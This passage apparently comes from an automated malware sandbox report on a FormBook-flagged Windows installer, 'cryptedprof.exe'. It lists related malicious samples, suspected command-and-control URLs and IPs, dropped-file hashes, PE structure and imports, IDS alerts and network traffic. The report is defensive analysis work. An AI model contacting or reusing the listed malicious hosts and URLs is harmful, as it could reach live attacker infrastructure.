                                              • www.cyberxchange.net/dll/?alI=J6AlYtFHR6r&DxlLi=O16Cpvehw381JgOcsiBVvt6SNBXVOB+15MfeRQ6rIhocO090ZFQOuEsCZWtNgYTmelCy
                                              IMG_7742_Scanned.docGet hashmaliciousBrowse
                                              • www.beasley.digital/gypo/?UrjPuprX=M7Hk14MLzXe1S9acHT7ZsieFPBYG9bGpGcbZ4ICPUuDVYKBFzTViR4JE6d+ne5phLrjWAg==&nnLx=UBZp3XKPefjxdB
                                              Outstanding Invoices.pdf.exeGet hashmaliciousBrowse
                                              • www.arescsg.com/ocq1/?Bl=lHLLrF4h72F&ITrHi2v=QNjT++wY9a5zCVAjoE7Ie93o6MHPk5lGE/qlj9tP3aNbcRLbl33t+j0E2POpmVTB9EfC

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              CLAYERLIMITED-AS-APClayerLimitedHKOrder_20180218001.exeGet hashmaliciousBrowse
                                              • 168.206.32.3
                                              IMG_7189012.exeGet hashmaliciousBrowse
                                              • 168.206.237.221
                                              P.O-48452689535945.exeGet hashmaliciousBrowse
                                              • 164.88.229.28
                                              wFzMy6hehS.exeGet hashmaliciousBrowse
                                              • 168.206.86.147
                                              mWxzYlRCUi.exeGet hashmaliciousBrowse
                                              • 168.206.86.147
                                              PO copy.pdf.exeGet hashmaliciousBrowse
                                              • 168.206.238.199
                                              urBYw8AG15.exeGet hashmaliciousBrowse
                                              • 168.206.35.5
                                              Shipping Document PL&BL Draft (1).exeGet hashmaliciousBrowse
                                              • 164.88.229.28
                                              KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                              • 160.122.149.237
                                              PO71109.EXEGet hashmaliciousBrowse
                                              • 168.206.119.65
                                              PO_210202.exeGet hashmaliciousBrowse
                                              • 168.206.52.196
                                              HwL7D1UcZG.exeGet hashmaliciousBrowse
                                              • 155.159.249.22
                                              q5oRsfy1vk.exeGet hashmaliciousBrowse
                                              • 160.122.149.237
                                              d3YVxiHt5J.exeGet hashmaliciousBrowse
                                              • 164.88.153.167
                                              Statement for January 2021.exeGet hashmaliciousBrowse
                                              • 160.121.137.1
                                              #Uc1a1#Uc7a5-00612648.docGet hashmaliciousBrowse
                                              • 164.155.230.99
                                              MPbBCArHPF.exeGet hashmaliciousBrowse
                                              • 168.206.202.111
                                              #0009584.docGet hashmaliciousBrowse
                                              • 164.155.230.99
                                              LKTD0004377.docGet hashmaliciousBrowse
                                              • 164.155.230.99
                                              Documents.docGet hashmaliciousBrowse
                                              • 164.155.230.99
                                              GOOGLEUSnethelper.exeGet hashmaliciousBrowse
                                              • 35.228.210.99
                                              PO112000891122110.exeGet hashmaliciousBrowse
                                              • 142.250.186.33
                                              firefox-3.0.0.zipGet hashmaliciousBrowse
                                              • 35.244.181.201
                                              MT OCEAN STAR ISO 8217 2005.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              fedex.apkGet hashmaliciousBrowse
                                              • 142.250.186.138
                                              Malody-4.3.7.apkGet hashmaliciousBrowse
                                              • 142.250.186.74
                                              Malody-4.3.7.apkGet hashmaliciousBrowse
                                              • 142.250.186.42
                                              Quote_13940007.exeGet hashmaliciousBrowse
                                              • 216.239.32.21
                                              0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              dex.dexGet hashmaliciousBrowse
                                              • 142.250.185.202
                                              dex.dexGet hashmaliciousBrowse
                                              • 142.250.185.170
                                              SKBM 0222.exeGet hashmaliciousBrowse
                                              • 216.239.32.21
                                              lpdKSOB78u.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              vBugmobiJh.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              crypted.exeGet hashmaliciousBrowse
                                              • 216.239.32.21
                                              NewOrder.xlsmGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              Order_20180218001.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              READYSERVER-SGREADYSERVERPTELTDSGhttp://t.info.clubmed.com/r/?id=h238e54e0,4a3b683d,4a3b6841&p1=b2bcamfood.com/press/6626c65776973406b666f7263652e636f6d#Ymxld2lzQGtmb3JjZS5jb20=Get hashmaliciousBrowse
                                              • 111.221.45.101
                                              ggRIRgK2tr.exeGet hashmaliciousBrowse
                                              • 103.200.210.66
                                              Email PO#.exeGet hashmaliciousBrowse
                                              • 103.207.71.33

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dllSecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeGet hashmaliciousBrowse
                                                QTN3C2AF414EDF9_041873.xlsxGet hashmaliciousBrowse
                                                  TIC ENQ2040 FCl.xlsxGet hashmaliciousBrowse
                                                    lpdKSOB78u.exeGet hashmaliciousBrowse
                                                      jTmBvrBw7V.exeGet hashmaliciousBrowse
                                                        523JHfbGM1.exeGet hashmaliciousBrowse
                                                          TAk8jeG5ob.exeGet hashmaliciousBrowse
                                                            PAYMENT COPY.exeGet hashmaliciousBrowse
                                                              ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                Orderoffer.exeGet hashmaliciousBrowse
                                                                  Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                    INV_PR2201.docmGet hashmaliciousBrowse
                                                                      CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                        Request for Quotation.exeGet hashmaliciousBrowse
                                                                          #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                            Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                                                              quote.exeGet hashmaliciousBrowse
                                                                                Order83930.exeGet hashmaliciousBrowse
                                                                                  Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                                                    Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Temp\8chdn.dll
                                                                                      Process:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11776
                                                                                      Entropy (8bit):6.515618036223174
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:BhCyADdd/dsb+YD5JOB+A8nxKJ8c0UWMH0Bi:/4n/+6G9xRU
                                                                                      MD5:F606DDBC12720E77335BB234DE7D3051
                                                                                      SHA1:806D928CD8C37F1121984CD10DB737260B07B599
                                                                                      SHA-256:55A8B4D54B2C5D7D5A8B5C2F55C57D5C365D0176F1E44833D17DADA120F4A68C
                                                                                      SHA-512:0D5921310A2E1C3223422E77CA07263A58E7513A1E60022B26DB1879648A0126B31C96CD02681F8A415CA105FB393BDA330F3807F6388380D2BC6B4D6122CB7B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..e-K.e-K.e-K.e,K.e-KI..K.e-K...K.e-K...K.e-K...K.e-K...K.e-KRich.e-K........PE..L...<.4`...........!.........&............... ...............................p............@..........................%..I.... .......P.......................`..\.................................................... ...............................code...2........................... ....rdata..I.... ......................@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\fhhit.ac
                                                                                      Process:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):185856
                                                                                      Entropy (8bit):7.999195886882973
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:PsU41q9M2FboK24/pOrBMy3LgSLnUZnSAUe+aL8yRvJzF3vY/vH7:0cBpOVMy3cpZnT+aYuJp3vYnH7
                                                                                      MD5:459E9C75DFA41F95277D89AF36332AD0
                                                                                      SHA1:959AD4FD57AF69845D537CFD5C0F8E1935F7FD30
                                                                                      SHA-256:8704B72C6EF206B17353D109FC6D0E7194E50C066C8C6DF8B42F547502C0D9D8
                                                                                      SHA-512:FEBCF2F3869E300F31DF2292D99F957D2ADCE6D62F068477C1CBF61B1390D1ADD42C91669557E13CCA3A596BDE10D619479E17B0115C7AC2A9AD99455F13654B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: .|..........40..Z.~..M.... a...r,r......~SZ....v...P.....WK.+|.R$_...a.G)...A.X..3NA.....2.......a5...&fk....,..R2......q..p2..Z..).!^B..j.z.1^.>z..n....M....3N...H..}.3.jr.. ..9.BM...O.3n. ..IG|f....+.)..?..../.<.f.N.'%q.?....%.u....~y?..3<..)E...p1.b......5.'..|.!..n..O.n.A.4...'..tO1..X.........H.o.v.t.4,:...<..m,gXr..|F..E."....?...6..q_.,..}....V....Z...J...i..W...r.~. n...+<?.2..8...~.........RD.....8..?..$aE...)..^Q.oj...9.C....'*-...-9........F...:....@..5).7......c(...d...!8.(TVCTgC.\....3..Tw..*.k^......iia.&...=2.c.5,.....#...?..g.K1.......Tv....E=.%7.%.Q{.)D.......&.I.@oT..2..`.sJ.....V.d.&n..a.sL]/..=.)$.J.#O^C.Jx`...`....*..3.....#.....o..H.fd...QB..}.B........RQ....Q.I...m\w.-.nZ..P;|.p......S..m.....?.6\..cw)Z..W.8..z....;>.R........I..=.. .q..=U).q.o..HO..0...~.Yl....J..|.0`.>........+..Y.=../Sx...73...P..X.MYe.C9.O."$.9...c.....O3 -..X2KI.}.b..<x.\C.cBv.CL.:.....g.......n..jop....J..<..X.Ma.Q9......8{0].?.x|.Au..Oh.z.b....i.]O.
                                                                                      C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll
                                                                                      Process:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11776
                                                                                      Entropy (8bit):5.855045165595541
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                      MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                      SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                      SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                      SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, Detection: malicious, Browse
                                                                                      • Filename: QTN3C2AF414EDF9_041873.xlsx, Detection: malicious, Browse
                                                                                      • Filename: TIC ENQ2040 FCl.xlsx, Detection: malicious, Browse
                                                                                      • Filename: lpdKSOB78u.exe, Detection: malicious, Browse
                                                                                      • Filename: jTmBvrBw7V.exe, Detection: malicious, Browse
                                                                                      • Filename: 523JHfbGM1.exe, Detection: malicious, Browse
                                                                                      • Filename: TAk8jeG5ob.exe, Detection: malicious, Browse
                                                                                      • Filename: PAYMENT COPY.exe, Detection: malicious, Browse
                                                                                      • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                      • Filename: Orderoffer.exe, Detection: malicious, Browse
                                                                                      • Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious, Browse
                                                                                      • Filename: INV_PR2201.docm, Detection: malicious, Browse
                                                                                      • Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious, Browse
                                                                                      • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                                                      • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious, Browse
                                                                                      • Filename: Purchase Order___pdf ____________.exe, Detection: malicious, Browse
                                                                                      • Filename: quote.exe, Detection: malicious, Browse
                                                                                      • Filename: Order83930.exe, Detection: malicious, Browse
                                                                                      • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                                      • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\nsq1F7.tmp
                                                                                      Process:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):212876
                                                                                      Entropy (8bit):7.898845441356521
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:gLGYsU41q9M2FboK24/pOrBMy3LgSLnUZnSAUe+aL8yRvJzF3vY/vHSNt:gLGJcBpOVMy3cpZnT+aYuJp3vYnH6t
                                                                                      MD5:392D17F078932F65177A128DC21CCE8C
                                                                                      SHA1:B7FBFEC205559E2698EA814FCC79CBDAC94E61FE
                                                                                      SHA-256:3BCA4926EA2A2FCD3A72893AF270033E9DCB8112B6BF24022FE47A7704E5A8B2
                                                                                      SHA-512:6FC6AB4E4D24D28F96C92B517393404279FFAA9B3B76B93F0BD3A37D27875E6A08F9CAE1AC28313088C041DA7066674FBB6C42D16F000D8B1EB844D7E13BB3BC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: |.......,...................#...................|...........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.1919627087512215
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:cryptedprof.exe
                                                                                      File size:339210
                                                                                      MD5:72efe20e4a59ae2722383b8786956994
                                                                                      SHA1:453b2af3b318668926087556eebfa93eda75d2df
                                                                                      SHA256:d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
                                                                                      SHA512:3b4c4106d6576ff14419bc9144473e9cc6ef1177dbcd7d9319559fe05563cdf50e9dc62d179464b07d020e98f92da52435e388d3e0e754ca65b14ac0d4e5320e
                                                                                      SSDEEP:6144:111QBRRiKNkBMH1JtudsBnOVMy3cdZnT8aYuJp3v4qzVpwyeLyA:iRtkBMH1ruds5+r3cdZnYalF44VTG
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...........4............@

                                                                                      File Icon

                                                                                      Icon Hash:70cc8696868ce031

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x403486
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      sub esp, 00000184h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor ebx, ebx
                                                                                      push 00008001h
                                                                                      mov dword ptr [esp+18h], ebx
                                                                                      mov dword ptr [esp+10h], 0040A130h
                                                                                      mov dword ptr [esp+20h], ebx
                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                      call dword ptr [004080B0h]
                                                                                      call dword ptr [004080C0h]
                                                                                      and eax, BFFFFFFFh
                                                                                      cmp ax, 00000006h
                                                                                      mov dword ptr [0042F44Ch], eax
                                                                                      je 00007F1D44B738D3h
                                                                                      push ebx
                                                                                      call 00007F1D44B76A4Eh
                                                                                      cmp eax, ebx
                                                                                      je 00007F1D44B738C9h
                                                                                      push 00000C00h
                                                                                      call eax
                                                                                      mov esi, 004082A0h
                                                                                      push esi
                                                                                      call 00007F1D44B769CAh
                                                                                      push esi
                                                                                      call dword ptr [004080B8h]
                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                      cmp byte ptr [esi], bl
                                                                                      jne 00007F1D44B738ADh
                                                                                      push 0000000Bh
                                                                                      call 00007F1D44B76A22h
                                                                                      push 00000009h
                                                                                      call 00007F1D44B76A1Bh
                                                                                      push 00000007h
                                                                                      mov dword ptr [0042F444h], eax
                                                                                      call 00007F1D44B76A0Fh
                                                                                      cmp eax, ebx
                                                                                      je 00007F1D44B738D1h
                                                                                      push 0000001Eh
                                                                                      call eax
                                                                                      test eax, eax
                                                                                      je 00007F1D44B738C9h
                                                                                      or byte ptr [0042F44Fh], 00000040h
                                                                                      push ebp
                                                                                      call dword ptr [00408038h]
                                                                                      push ebx
                                                                                      call dword ptr [00408288h]
                                                                                      mov dword ptr [0042F518h], eax
                                                                                      push ebx
                                                                                      lea eax, dword ptr [esp+38h]
                                                                                      push 00000160h
                                                                                      push eax
                                                                                      push ebx
                                                                                      push 00429878h
                                                                                      call dword ptr [0040816Ch]
                                                                                      push 0040A1ECh

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x19038.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x65ad0x6600False0.675628063725data6.48593060343IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x80000x13800x1400False0.4634765625data5.26110074066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xa0000x255580x600False0.470052083333data4.21916068772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x380000x190380x19200False0.341466495647data4.34524426272IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_ICON0x382980x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                      RT_ICON0x48ac00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 1073807359, next used block 4294903552
                                                                                      RT_ICON0x4cce80x25a8data
                                                                                      RT_ICON0x4f2900x10a8data
                                                                                      RT_ICON0x503380x468GLS_BINARY_LSB_FIRST
                                                                                      RT_DIALOG0x507a00x100dataEnglishUnited States
                                                                                      RT_DIALOG0x508a00x11cdataEnglishUnited States
                                                                                      RT_DIALOG0x509bc0x60dataEnglishUnited States
                                                                                      RT_GROUP_ICON0x50a1c0x4cdata
                                                                                      RT_VERSION0x50a680x290MS Windows COFF PA-RISC object fileEnglishUnited States
                                                                                      RT_MANIFEST0x50cf80x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                      Imports

                                                                                      DLLImport
                                                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                      Version Infos

                                                                                      DescriptionData
                                                                                      LegalCopyrightCopyright shivering
                                                                                      FileVersion65.93.64.23
                                                                                      CompanyNamedaf
                                                                                      LegalTrademarksmist
                                                                                      Commentscrookback
                                                                                      ProductNamepinewood king bolete
                                                                                      FileDescriptionAbkhazian (Latin script)
                                                                                      Translation0x0409 0x04e4

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      02/23/21-15:32:01.456680TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.634.102.136.180
                                                                                      02/23/21-15:32:01.456680TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.634.102.136.180
                                                                                      02/23/21-15:32:01.456680TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.634.102.136.180
                                                                                      02/23/21-15:32:01.600872TCP1201ATTACK-RESPONSES 403 Forbidden804974634.102.136.180192.168.2.6
                                                                                      02/23/21-15:32:44.386288TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6111.221.46.49
                                                                                      02/23/21-15:32:44.386288TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6111.221.46.49
                                                                                      02/23/21-15:32:44.386288TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6111.221.46.49

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 23, 2021 15:32:01.415462017 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.456418991 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.456542015 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.456680059 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.501941919 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.600872040 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.600924015 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.601119041 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.601254940 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.642165899 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.010490894 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.405154943 CET8049752168.206.81.138192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.405332088 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.405430079 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.799341917 CET8049752168.206.81.138192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.799669981 CET8049752168.206.81.138192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.799896002 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.800066948 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:23.199253082 CET8049752168.206.81.138192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.193600893 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.385819912 CET8049753111.221.46.49192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.386015892 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.386287928 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.578690052 CET8049753111.221.46.49192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.603816986 CET8049753111.221.46.49192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.603853941 CET8049753111.221.46.49192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.604140043 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.604228020 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.800883055 CET8049753111.221.46.49192.168.2.6

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 23, 2021 15:30:40.467911959 CET5451353192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:30:40.518728971 CET53545138.8.8.8192.168.2.6
